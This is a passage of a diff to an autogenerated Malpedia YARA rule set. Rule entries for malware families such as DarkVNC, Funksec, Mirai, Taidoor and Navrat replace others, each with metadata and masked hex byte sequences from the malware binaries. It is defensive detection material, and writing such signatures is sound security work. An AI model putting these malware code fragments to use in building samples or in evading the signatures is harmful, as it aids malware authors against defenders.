+		$sequence_6 = { c1e918 8b550c 884a53 8b450c }
+		$sequence_7 = { 85c0 744b 8b5508 0fb602 }
+		$sequence_8 = { 8945f0 837df000 0f8485000000 8b4df0 0fbe5108 83fa02 7410 }
+		$sequence_9 = { 8945f8 8b4ddc f7d1 0b4df8 334de4 8b5508 038a94000000 }
 
 	condition:
-		7 of them and filesize < 454656
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Proto8_Rat_Auto : FILE
+rule MALPEDIA_Win_Darkvnc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a653386d-0e84-5fa0-9e05-c0a8f9e5f3b1"
+		id = "333202ce-cf04-5e1c-95d5-ed62536bc798"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.proto8_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.proto8_rat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkvnc_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "e04ff586ad60efc989beb40a085354d9626a8059dbb86884929c6e4aa752aeb0"
+		logic_hash = "7d4bb25715c42c98fca5b840dde51c070d19a7e331a44598eca4d1a3afd0df99"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88340,32 +88359,32 @@ rule MALPEDIA_Win_Proto8_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5a10 8b4210 83c308 83e3fa a801 7421 8b4210 }
-		$sequence_1 = { ba80000000 e8???????? c70302000000 4c8b8320010000 488d4318 488b9328010000 33f6 }
-		$sequence_2 = { 837c244801 0f8595000000 488b6c2458 8b7b30 488b4b48 488b01 ff5008 }
-		$sequence_3 = { 7468 3bca 8bc1 0f46c2 ffc0 4103c0 3bf0 }
-		$sequence_4 = { 89531c 48873cc8 4885ff 7506 8d4201 89431c 40f6c701 }
-		$sequence_5 = { e8???????? 448bf0 e9???????? 4c8b86a8000000 488d8e88000000 488b96b0000000 4d8bcd }
-		$sequence_6 = { 7636 66660f1f840000000000 8bc8 48c1e106 428b541124 85d2 }
-		$sequence_7 = { 8b8b64810100 897dd4 897de4 897df4 488b8378810100 488d55b0 }
-		$sequence_8 = { 83e801 7455 83e801 743d 83e801 740a 83f801 }
-		$sequence_9 = { 8b4318 3bc8 0f8e96000000 488b4b38 48894c2450 e8???????? }
+		$sequence_0 = { 428994817c120000 48638178540000 891481 ff8178540000 c3 8bc2 41b2ff }
+		$sequence_1 = { 81f9f4010000 7265 488bd5 898708030000 488bcf e8???????? 488b4768 }
+		$sequence_2 = { 4c8bc1 ebdd 81fba3000000 0f8583000000 33d2 488bcf ff15???????? }
+		$sequence_3 = { 4c8bf9 4889b5b8020000 4889bdc0020000 488d1508df0000 488d4d00 33ff 4d8be1 }
+		$sequence_4 = { 488d542420 488bcf e8???????? 8bd8 488b0d???????? 4c8bc7 33d2 }
+		$sequence_5 = { 740c 498bd7 488bcb ff15???????? 4d85f6 740c }
+		$sequence_6 = { f645e801 7425 8b8f80000000 85c9 0f94c0 a801 7436 }
+		$sequence_7 = { e9???????? 488b442448 4889442460 488b442460 4863403c 488b4c2460 4803c8 }
+		$sequence_8 = { 83caff ff15???????? 488d55e0 488bcb e8???????? 488b8be8070000 ff15???????? }
+		$sequence_9 = { 4889842480000000 4883bc24800000000d 0f874b070000 488d0577f9feff 488b8c2480000000 8b8c88dc0d0100 }
 
 	condition:
-		7 of them and filesize < 2537472
+		7 of them and filesize < 606208
 }
-rule MALPEDIA_Win_Listrix_Auto : FILE
+rule MALPEDIA_Win_Zenar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ae5c6849-5b5a-5879-a75b-5bc936755797"
+		id = "33657347-5dc4-5466-88de-08ba2a4ff542"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.listrix_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zenar_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "a979992135eb70be35ff3f9edeaffae4a914b7c2e246324beb1e16b7e069112c"
+		logic_hash = "b1dde475bc16460bb8f7878e012acfd9a678e7c83f20d6fc1c96df7645d0898c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88379,32 +88398,32 @@ rule MALPEDIA_Win_Listrix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff15???????? 85f6 0f8492000000 0fb78deef7ffff }
-		$sequence_1 = { 51 52 50 8d8dc0f5ffff 51 }
-		$sequence_2 = { 55 8bec 33c0 8b4d08 3b0cc5186a4000 740a 40 }
-		$sequence_3 = { ebe6 c745e060614000 817de064614000 7311 8b45e0 8b00 85c0 }
-		$sequence_4 = { 817de45c614000 7311 8b45e4 8b00 85c0 }
-		$sequence_5 = { 8b5510 8d46ff 50 8b8584f5ffff 51 52 }
-		$sequence_6 = { 52 ff15???????? 68???????? 8d85f4f7ffff 50 }
-		$sequence_7 = { 668b4c4310 66890c457ca74000 40 ebe8 33c0 8945e4 3d01010000 }
-		$sequence_8 = { 7718 0f85b6000000 8b85a8f5ffff 3b857cf5ffff 0f86a4000000 0fb78deef7ffff }
-		$sequence_9 = { 52 ff15???????? 83c428 8d85f4fbffff 50 }
+		$sequence_0 = { 8b4d8c 51 50 e8???????? 59 }
+		$sequence_1 = { 751a 83f8ff 740f 83f8fe 740a 6bcf38 030c9598ae4300 }
+		$sequence_2 = { 83c801 50 6800000080 ff7508 e8???????? 5d }
+		$sequence_3 = { 56 ff7508 e8???????? 83c40c e9???????? 8b048d98ae4300 807c022800 }
+		$sequence_4 = { 68???????? eb0c 68???????? eb05 68???????? e8???????? 39be90000000 }
+		$sequence_5 = { 8bf1 57 ff750c 33ff 8975fc 8d4e0c c706???????? }
+		$sequence_6 = { c3 6857000780 68???????? 8d4df0 e8???????? 68???????? 8d45f0 }
+		$sequence_7 = { 8945fc 56 ff750c 8b7508 8d45fa 50 8975c8 }
+		$sequence_8 = { 3bfe 72f3 33c0 66890472 8bc3 }
+		$sequence_9 = { 48 6a5c 5e 8d0442 eb0d 6683f92f 740f }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 519168
 }
-rule MALPEDIA_Win_Grapeloader_Auto : FILE
+rule MALPEDIA_Win_Funksec_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eb279ded-b2c5-5f10-9bdf-71ce0cb379f9"
+		id = "9193fd51-0ac6-5db6-9635-e6eb925df3d1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grapeloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grapeloader_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.funksec"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.funksec_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9956347475bad3c02131a3202e37348872c31d719ae25d5814bb41f19904ddf4"
+		logic_hash = "06f95012988e8bb48797f6f8504bd1b10c3653d29a2d1e0983bf3fe910630ecb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88418,32 +88437,32 @@ rule MALPEDIA_Win_Grapeloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 88542417 48894c2408 48c7042400000000 48833c2414 731e 8a542417 }
-		$sequence_1 = { 0fbe4c2429 0fb7442410 01c8 6689442410 0fb644241b 0faf442420 89442420 }
-		$sequence_2 = { eb00 488b8580000000 4889e1 488d95c4020000 48895120 48c7c1ffffffff 488d95d0020000 }
-		$sequence_3 = { 5b c3 4883ec28 4c8d0d85b60000 33c9 4c8d0578b60000 488d1579b60000 }
-		$sequence_4 = { 4883ec38 4889542430 48894c2428 488b4c2428 48894c2420 48c7015c000000 }
-		$sequence_5 = { 03442438 89442438 0fb744243c 05876c0000 668944243c 8b442438 03442424 }
-		$sequence_6 = { 29c8 88442413 0fbf44243a 69c0be000000 668944243a 0fbf4c243a }
-		$sequence_7 = { 4889442428 f6401c01 7412 488b4c2428 c6411c00 4883c108 e8???????? }
-		$sequence_8 = { 488d8d08030000 e8???????? 488d8d38030000 e8???????? c7850003000000000000 488d8ddf020000 }
-		$sequence_9 = { eb00 488b9590010000 488b8d80010000 e8???????? 48898578010000 eb00 }
+		$sequence_0 = { e8???????? 4c8bb550020000 440fb68d58020000 48b80a00000000000080 4939c6 0f85a9020000 4489e1 }
+		$sequence_1 = { e8???????? 66c7060101 c7460401000000 488d05b2591e00 48894608 48c7461001000000 0f57c0 }
+		$sequence_2 = { e9???????? 488b8528110000 48898520110000 4c8d0564cf2c00 ba80000000 e8???????? e9???????? }
+		$sequence_3 = { ba21000000 e8???????? 488d0ddb081100 4c8d056c091100 ba1f000000 e8???????? 488d0d73091100 }
+		$sequence_4 = { e8???????? 84c0 89fb 0f84f6000000 488b0d???????? 488b4138 4885c0 }
+		$sequence_5 = { e9???????? 4489f0 83e01f 410fb65701 83e23f 4180fedf 7664 }
+		$sequence_6 = { e9???????? 488d05f6d11400 488985a0000000 48c785a800000001000000 48c785b000000008000000 0f57c0 0f1185b8000000 }
+		$sequence_7 = { e8???????? ebde 498b07 4885c0 0f84c3010000 48c1e003 488d1440 }
+		$sequence_8 = { e8???????? 4c8bad30360000 4d8db518010000 41b828030000 4c89f1 4889da e8???????? }
+		$sequence_9 = { ebd0 49ffc3 49ffc9 4d8918 4d894808 488d05cdf81000 488945d8 }
 
 	condition:
-		7 of them and filesize < 397312
+		7 of them and filesize < 10986496
 }
-rule MALPEDIA_Win_Naikon_Auto : FILE
+rule MALPEDIA_Win_Kivars_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1a371971-3c14-5c5c-93ec-3bfac331df93"
+		id = "97e9352f-68df-56fa-86e0-872f02c50448"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.naikon_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kivars_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "83032b5030b393c588ce5d94661092c796ec6d6ab26688f2a44eab055633535d"
+		logic_hash = "4d20cf7aacd2e8c5bf1e2fc02d32857c61e25ca91f0ca5072534ea8bbca535b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88457,34 +88476,40 @@ rule MALPEDIA_Win_Naikon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf8 59 3bfb 59 741d 8b06 2bc7 }
-		$sequence_1 = { eb05 397df8 7415 8d45f0 }
-		$sequence_2 = { 8975c4 8945b0 8b450c 8945bc 03f0 8b45e4 8b4f6c }
-		$sequence_3 = { 53 50 e8???????? 6a04 8d85f8fdffff 68???????? 50 }
-		$sequence_4 = { 8b06 03c3 68???????? 50 e8???????? 68???????? e9???????? }
-		$sequence_5 = { 03c8 83c00c 8903 8d45d8 6a0c 50 ff750c }
-		$sequence_6 = { e8???????? ff75fc e8???????? 83c414 eb02 33db }
-		$sequence_7 = { 6a10 68???????? e9???????? 6a00 ff75fc 53 8d853cffffff }
-		$sequence_8 = { 8b00 52 53 53 8b4010 }
-		$sequence_9 = { 838e90000000ff 8dbe8c000000 85c0 740a 50 ff15???????? }
+		$sequence_0 = { 448bc0 488d542440 488b8c2478080000 e8???????? }
+		$sequence_1 = { e8???????? 4c8d442440 488d942464030000 488b8c24e0050000 e8???????? }
+		$sequence_2 = { c784247004000001000000 83bc247004000000 7548 c784247c05000000000000 488d8c2440010000 }
+		$sequence_3 = { e8???????? 90 488d4c2430 e8???????? 486344242c }
+		$sequence_4 = { 8bcb 66897304 e8???????? 83f8ff }
+		$sequence_5 = { 85c0 7424 50 8b4354 50 ffd7 }
+		$sequence_6 = { 49 80bc0c7b0100005c 7433 bf???????? 83c9ff }
+		$sequence_7 = { 33c0 8d7c2418 f3ab 8d4366 6689542418 6a00 6a00 }
+		$sequence_8 = { 488d8c24780b0000 e8???????? e9???????? 488d542430 488d8c2440010000 }
+		$sequence_9 = { 482bc8 488bc1 89442428 e9???????? 8b442440 ffc8 }
+		$sequence_10 = { e9???????? 488b842460100000 48ffc0 ba3a000000 }
+		$sequence_11 = { 51 89442420 897c2434 ff15???????? 8b4c241c }
+		$sequence_12 = { 0bf0 83e23f 83c703 83c504 8a443410 }
+		$sequence_13 = { 894c244e b900080000 668b5004 33c0 50 50 }
+		$sequence_14 = { 8d7a01 57 e8???????? 83c404 8bd8 }
+		$sequence_15 = { 8b842400010000 488bc8 ff15???????? 4889842480000000 4883bc248000000000 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Ketrican_Auto : FILE
+rule MALPEDIA_Win_Navrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "17c7dffb-a011-5900-a31d-1d30da8f8252"
+		id = "0af75ae7-7ace-560b-b2d7-c19b71f71863"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ketrican_auto.yar#L1-L230"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.navrat_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "bc80dac3ff7e066cc7e5cdc3a2c5cdfaac267fb28bf5e233f76a95cbb08049bc"
+		logic_hash = "ae93408812c109848736690d96b263c956c354ad0be060f7ff964bd9ca44b655"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -88496,47 +88521,34 @@ rule MALPEDIA_Win_Ketrican_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8965f0 33db 895dfc 33c0 }
-		$sequence_1 = { 5e c3 55 8bec 837d0800 7d0a }
-		$sequence_2 = { 8bc1 8945f0 834dfcff e8???????? }
-		$sequence_3 = { e8???????? 83c010 8906 c3 56 8bf1 57 }
-		$sequence_4 = { 5f 5e 8901 5b 5d c20800 680e000780 }
-		$sequence_5 = { 7417 6a0a 6a1f 68???????? }
-		$sequence_6 = { e8???????? cc 8b06 83e810 8b08 395008 }
-		$sequence_7 = { e8???????? 8b06 5d c20400 55 8bec 8b4508 }
-		$sequence_8 = { 8bc7 c1e810 83e03f e8???????? }
-		$sequence_9 = { 2bc6 8b35???????? 53 8bf8 57 }
-		$sequence_10 = { 8bec 8b4508 53 56 57 8d7001 33db }
-		$sequence_11 = { 56 8d4806 57 e8???????? 83c414 8bf0 }
-		$sequence_12 = { 83c604 8345f804 8b45f8 5f c60600 5e }
-		$sequence_13 = { 7706 8a4405bc c9 c3 }
-		$sequence_14 = { eb1f 68???????? e8???????? a3???????? }
-		$sequence_15 = { 8b8a8c2f0000 33c8 e8???????? b8???????? e9???????? }
-		$sequence_16 = { b8???????? e9???????? 8b542408 8d420c 8b8aecfdffff 33c8 e8???????? }
-		$sequence_17 = { e9???????? c705????????ac824100 c3 b9???????? e9???????? }
-		$sequence_18 = { e9???????? 8d45d0 e9???????? 8d4dd0 }
-		$sequence_19 = { e9???????? 8b4508 e9???????? 8b45ec 83e001 0f840c000000 8365ecfe }
-		$sequence_20 = { e9???????? 8d4dd0 e9???????? 8d4de0 e9???????? 8d4db8 e9???????? }
-		$sequence_21 = { e9???????? 8d4ddc e9???????? 8b45d4 83e001 }
-		$sequence_22 = { 8365d4fe 8d4da4 e9???????? c3 8d4dbc e9???????? }
+		$sequence_0 = { c1e610 0bf0 56 e8???????? }
+		$sequence_1 = { 7707 0fbec0 83e847 c3 8d48d0 80f909 }
+		$sequence_2 = { 1bf6 f7de 56 68???????? e8???????? }
+		$sequence_3 = { 8d48bf 80f919 7707 0fbec0 83e841 }
+		$sequence_4 = { 8d85a4feffff 50 6801000080 ff15???????? }
+		$sequence_5 = { 56 50 57 a3???????? ff15???????? 57 ff15???????? }
+		$sequence_6 = { 0fbec0 83e847 c3 8d48d0 80f909 7707 }
+		$sequence_7 = { 7503 884702 85f6 7407 8b7608 }
+		$sequence_8 = { fec8 2440 fec8 c3 }
+		$sequence_9 = { 884702 85f6 7407 8b7608 }
 
 	condition:
-		7 of them and filesize < 1449984
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Divergent_Auto : FILE
+rule MALPEDIA_Win_Rdat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0e7b7156-a784-541b-bc2e-90cf2a4a8de0"
+		id = "5a60ab37-0286-51c1-b368-c89969708302"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.divergent_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rdat_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "59dd95ddff9efda2ca5f59f400b3973c8f58905843f6145e813b39dc6d7537d1"
-		score = 75
-		quality = 75
+		logic_hash = "a3c5411cc41035f8ac417b9a4fa9bb993690d8d8e560ea34758edef8eeee5bff"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -88548,32 +88560,38 @@ rule MALPEDIA_Win_Divergent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 781e 8d85f8fdffff 50 }
-		$sequence_1 = { 50 e8???????? 59 59 8b0b 8bd7 eb08 }
-		$sequence_2 = { 6aff 0f44c1 50 57 ff15???????? 8bf0 85f6 }
-		$sequence_3 = { 68???????? eb37 68???????? eb30 68???????? eb29 68???????? }
-		$sequence_4 = { f77dfc 43 8aca 81fb00010000 7cba 5f 5e }
-		$sequence_5 = { 786e ff75e0 ff15???????? 40 50 e8???????? 8bf0 }
-		$sequence_6 = { eb03 8b7dfc 8b36 85f6 0f8574ffffff }
-		$sequence_7 = { e8???????? ff730c 68???????? 56 e8???????? f20f104310 83c420 }
-		$sequence_8 = { 894dd4 894dd8 ff15???????? 33db 85c0 0f99c3 85db }
-		$sequence_9 = { d9e0 dec1 dd5df8 dd45f8 8be5 5d c3 }
+		$sequence_0 = { 4c8bc3 4c0f42c7 4d85c0 7504 }
+		$sequence_1 = { 48897020 498bf8 488bda 488bf1 b920000000 }
+		$sequence_2 = { 0f8d9e000000 488b4660 3b5668 7c1d }
+		$sequence_3 = { 0f8d83000000 488b82b0000000 443b82b8000000 7c25 442b82b8000000 48638ab8000000 488b7cc8f8 }
+		$sequence_4 = { 4533c9 488bfa 4c8bc1 85db 7e77 }
+		$sequence_5 = { 4889742410 57 4883ec20 488b02 488bf1 488bfa 488b18 }
+		$sequence_6 = { 0f85a8000000 83791804 0f859e000000 8b4920 }
+		$sequence_7 = { 6690 48ffc3 4038341a 75f7 4883791810 488b7910 7203 }
+		$sequence_8 = { 85c0 740b b9e8030000 ff15???????? }
+		$sequence_9 = { e8???????? 4898 4885c0 751e 483bfb 7313 }
+		$sequence_10 = { 4883ec40 48c740d8feffffff 48895808 48897020 }
+		$sequence_11 = { 0f8d89000000 496398b8000000 498b80b0000000 3bd3 }
+		$sequence_12 = { 488b7910 7203 488b09 483bfb 4c8bc3 4c0f42c7 }
+		$sequence_13 = { 486bd158 490314c0 eb07 488d15f6a30100 f6420820 7417 }
+		$sequence_14 = { 41b803000000 498b17 488d4d90 e8???????? 90 }
+		$sequence_15 = { 90 48c78424b80000000f000000 4c89b424b0000000 c68424a000000000 4983c9ff 4533c0 488d942470030000 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 1573888
 }
-rule MALPEDIA_Win_Lodeinfo_Auto : FILE
+rule MALPEDIA_Win_Taidoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2842da77-f970-52c3-8984-a714a7915a2f"
+		id = "ba437ab9-6c90-576a-83d2-5801ebb87e42"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lodeinfo_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.taidoor_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "c6db0fe0e940f8fa6652bc4d77f8fe0b30871c4844a8eaef730ac89cf20d8f74"
+		logic_hash = "7b8ed6f15654e580fefed39d2d4fea0473e69a1fd6a98339a075f2fbcf4be749"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88587,32 +88605,32 @@ rule MALPEDIA_Win_Lodeinfo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85db 742a 8b4c2420 8bc3 2bcb 81f900100000 }
-		$sequence_1 = { 7418 8b4114 3b4614 753f 8b4118 3b4618 7537 }
-		$sequence_2 = { ba???????? b9???????? e8???????? 50 e8???????? 8b5c2448 83c404 }
-		$sequence_3 = { 8b8d34ffffff 8bfe c1ef03 0fafcf }
-		$sequence_4 = { 83c404 46 83fe10 75e3 5f }
-		$sequence_5 = { 8955e4 81faff000000 7756 8b55f8 8b4308 8b3a 47 }
-		$sequence_6 = { b22d e8???????? 83eb01 75f4 b22b e8???????? 50 }
-		$sequence_7 = { 23c7 03d8 895de4 8b7d0c 8bcf }
-		$sequence_8 = { 0fb65204 c1e218 d3e2 0bd3 8b5de4 eb68 c7461000000000 }
-		$sequence_9 = { 83c404 83f810 722b 8b4c242c 8d5001 8bc1 81fa00100000 }
+		$sequence_0 = { 7433 ff750c 889c05f4fbffff 50 8d85f4fbffff 6a01 50 }
+		$sequence_1 = { 395d10 7e1b 56 8b450c }
+		$sequence_2 = { 897df0 50 56 e8???????? 8b3d???????? 83f86f 750c }
+		$sequence_3 = { 83a00401000000 b001 c9 c20800 8b8104010000 }
+		$sequence_4 = { 7e24 8a0406 fec0 3c3a 8845ec }
+		$sequence_5 = { 57 a0???????? c745fc01000000 8ac8 f6d9 1bc9 33db }
+		$sequence_6 = { b940420f00 f7f9 8d45e0 52 ff35???????? ff35???????? }
+		$sequence_7 = { e9???????? 8d4de0 e8???????? 8d8588f7ffff 50 ff35???????? ffd6 }
+		$sequence_8 = { ff75ec 8d4df0 e8???????? 8b450c 46 3b70f8 7cdc }
+		$sequence_9 = { 53 50 53 c7458844000000 }
 
 	condition:
-		7 of them and filesize < 712704
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Arefty_Auto : FILE
+rule MALPEDIA_Win_Xsplus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "00e4c323-1086-5d09-b0dc-b3d3486d1cb0"
+		id = "5e1cc002-aafa-57a5-ac8f-12fca4d9f30a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.arefty_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xsplus_auto.yar#L1-L182"
 		license_url = "N/A"
-		logic_hash = "d90c0aff72ecb08f18ac74bec7d59a72670c6515429c6fde34529cd8bd03f3d6"
+		logic_hash = "dcc5687f917495ecca687c74006688a8948f135325a7531bf3c5206fe8cc2299"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88626,32 +88644,39 @@ rule MALPEDIA_Win_Arefty_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 e8???????? 83c404 83fbff 7407 53 }
-		$sequence_1 = { 50 53 ff15???????? 680000a000 e8???????? 8bf8 }
-		$sequence_2 = { 50 8b07 68???????? 6a03 8d04b0 50 e8???????? }
-		$sequence_3 = { 8b07 68???????? 6a03 8d04b0 }
-		$sequence_4 = { ff15???????? 680000a000 e8???????? 8bf8 }
-		$sequence_5 = { ff15???????? 85ff 7409 57 e8???????? 83c404 83fbff }
-		$sequence_6 = { 8b07 68???????? 6a03 8d04b0 50 e8???????? 46 }
-		$sequence_7 = { 0fb6041e 50 8b07 68???????? 6a03 8d04b0 50 }
-		$sequence_8 = { 50 53 ff15???????? 680000a000 e8???????? }
-		$sequence_9 = { 0fb6041e 50 8b07 68???????? 6a03 }
+		$sequence_0 = { 8b761c 8b4608 8b7e20 8b36 66394f18 75f2 }
+		$sequence_1 = { 8bec 83ec18 8b4518 8945f0 8b4d14 }
+		$sequence_2 = { 8b55ec 8b01 3b4210 0f83af000000 6a01 8d4df8 51 }
+		$sequence_3 = { 8b5520 8955f8 8b451c 8945e8 8b4d10 83e102 85c9 }
+		$sequence_4 = { 83c201 8955f8 8b4514 8945f4 }
+		$sequence_5 = { aa a0???????? 8885c8fbffff b940000000 33c0 8dbdc9fbffff }
+		$sequence_6 = { 85c0 7524 a1???????? a3???????? a1???????? c705????????04264000 8935???????? }
+		$sequence_7 = { 8b8db4fdffff 81e9cd860100 898db4fdffff 83bdb4fdffff03 }
+		$sequence_8 = { 898da8feffff 8b95a8feffff 52 8b85ccfeffff 50 8d4de0 }
+		$sequence_9 = { 6804010000 8d85fcfeffff 50 6a00 ff15???????? 6804010000 8d8df0fcffff }
+		$sequence_10 = { 8985b8fdffff 81bdb8fdffff10010000 7723 81bdb8fdffff10010000 }
+		$sequence_11 = { 8b5508 89510c 8b45ec 8b4d0c 894808 8b55ec c7421000000000 }
+		$sequence_12 = { c74668e0a34000 6a0d e8???????? 59 8365fc00 ff7668 ff15???????? }
+		$sequence_13 = { 8d85d0fcffff 50 8d8dc8fbffff 51 e8???????? }
+		$sequence_14 = { 0355fc 0fb602 33c1 8b4d0c 034dfc 8801 }
+		$sequence_15 = { 8a8c181d010000 888808a74000 40 ebe6 }
+		$sequence_16 = { 50 ff15???????? b801000000 e9???????? 8d95c4fdffff }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 597872
 }
-rule MALPEDIA_Win_Greetingghoul_Auto : FILE
+rule MALPEDIA_Win_Mirai_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ab352bb6-0e90-5ea4-81b4-0f0ddff67e2f"
+		id = "6b007e0f-a886-5f64-abd3-07f6ed5e9b2a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greetingghoul"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.greetingghoul_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mirai_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "05f8eb95e67f4d995ab80e8300d436e31d93b18d0182fa8edc0fa057e1e63b5a"
+		logic_hash = "63027a45f46dffdd65577fa0ba420730c7c3c1478a8b6e1e30240b9df0cbea70"
 		score = 75
 		quality = 75
 		tags = "FILE"
